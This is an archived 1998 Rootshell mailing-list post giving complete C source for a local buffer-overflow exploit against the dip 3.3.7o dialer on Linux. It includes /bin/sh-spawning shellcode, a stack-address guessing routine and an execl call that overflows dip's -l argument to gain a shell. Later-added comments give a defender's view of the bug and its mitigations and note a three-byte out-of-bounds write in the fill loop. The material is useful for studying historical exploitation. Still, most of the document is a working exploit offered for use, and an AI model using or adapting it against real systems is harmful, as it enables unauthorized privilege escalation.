-
- [ http://www.rootshell.com/ ]
-
- From jamez@uground.org Thu May 7 16:25:54 1998
- Date: Thu, 07 May 1998 20:13:55 +0000
- From: jamez <jamez@uground.org>
- To: www-request@rootshell.com
- Subject: dip 3.3.7o exploit
-
- hi there, there's an exploit for the dip 3.3.7 buffer overflow. Tested on
- Slackware 3.4.
- (7 May 1998)
-
- ---- cut here ----
-
- /*
- dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
- coded by jamez. e-mail: jamez@uground.org
-
- thanks to all ppl from uground.
-
- usage:
- gcc -o dip-exp dip3.3.7o-exp.c
- ./dip-exp offset (offset ranges from -100 to 100; probably 0; tested on Slackware 3.4)
- */
-
-
- /*
-  * Payload placed at the start of the argument: 45 bytes of x86 machine
-  * code ending in the string "/bin/sh" (presumably a shell-spawning stub;
-  * the page does not document the bytes). It contains no 0x00 byte, so the
-  * strlen() call in main() measures all 45 bytes.
-  */
- char shellcode[] =
-
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
-
- "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
- "\x80\xe8\xdc\xff\xff\xff/bin/sh";
-
-
- /* Total length of the argument handed to dip's -l option, including the
-  * terminating NUL. The page gives no figure for the size of dip's own
-  * buffer; the author's note below only says it is small. */
- #define SIZE 130
- /* cause it's a little buffer, i wont use NOP's */
-
- /* Argument buffer: shellcode first, then the guessed address repeated in
-  * 4-byte little-endian units, then a NUL. File scope, so zero-initialized. */
- char buffer[SIZE];
-
-
- /*
-  * Returns the current stack pointer.
-  *
-  * Written without a `return` statement: it relies on the x86 convention
-  * that the caller reads the result from %eax, which the inline asm has
-  * just loaded. Falling off the end of a non-void function and using the
-  * value is undefined behaviour in standard C, so this may break once the
-  * compiler reorders or discards the asm (it has no outputs or clobbers).
-  */
- unsigned long get_esp(void) {
- __asm__("movl %esp,%eax");
- }
-
-
- /*
-  * Builds a SIZE-byte argument and execs dip with it as the -l value.
-  * Layout: shellcode, then the guessed stack address repeated as 4-byte
-  * little-endian words, then a terminating NUL.
-  *
-  * Defender's view: the bug this targets is a fixed-size buffer in dip that
-  * presumably received the -l argument without a length check (dip's code
-  * is not on this page). The fix on the target side is to bound every copy
-  * of argv into local storage (snprintf-style, with the truncation checked)
-  * and to make privileged helpers reject over-long arguments outright.
-  * Stack canaries, a non-executable stack and ASLR would each be expected
-  * to defeat this harness, which depends on a stable stack address and on
-  * running code placed in the argument itself.
-  *
-  * Review notes on this listing:
-  *  - No #include lines: atoi(), strlen() and execl() are implicitly
-  *    declared, which C99 and later reject.
-  *  - `void main` is non-standard; main returns int.
-  *  - atoi() reports no errors; strtol() with an end-pointer check would.
-  *  - The fill loop writes out of bounds: with the 45-byte shellcode its
-  *    last iteration runs at i == 129 and stores buffer[129..132], three
-  *    bytes past the end of buffer[SIZE]. The bound needs to be i + 3 < SIZE.
-  */
- void main(int argc, char * argv[])
- {
- int i = 0,
- offset = 0;
- long addr;
-
-
- /* Optional user-supplied adjustment to the guessed stack address. */
- if(argc > 1) offset = atoi(argv[1]);
-
- /* Guess where the argument will sit in dip's stack: this process's own
-  * %esp minus a fixed delta (0xcb); the page does not say how the delta
-  * was derived beyond "tested on Slackware 3.4". */
- addr = get_esp() - offset - 0xcb;
-
- /* Copy the shellcode; strlen() is re-evaluated on every iteration. */
- for(i = 0; i < strlen(shellcode); i++)
- buffer[i] = shellcode[i];
-
- /* Fill the remainder with addr, low byte first (little-endian). See the
-  * header note: the final iteration overruns buffer by three bytes. */
- for (; i < SIZE; i += 4)
- {
- buffer[i ] = addr & 0x000000ff;
- buffer[i+1] = (addr & 0x0000ff00) >> 8;
- buffer[i+2] = (addr & 0x00ff0000) >> 16;
- buffer[i+3] = (addr & 0xff000000) >> 24;
- }
-
- /* NUL-terminate so the argument is a C string of SIZE - 1 bytes. */
- buffer[SIZE - 1] = 0;
-
- /* Replaces this process image with dip; its return value (only reached
-  * on failure) is not checked. */
- execl("/sbin/dip", "dip", "-k", "-l", buffer, (char *)0);
- }
-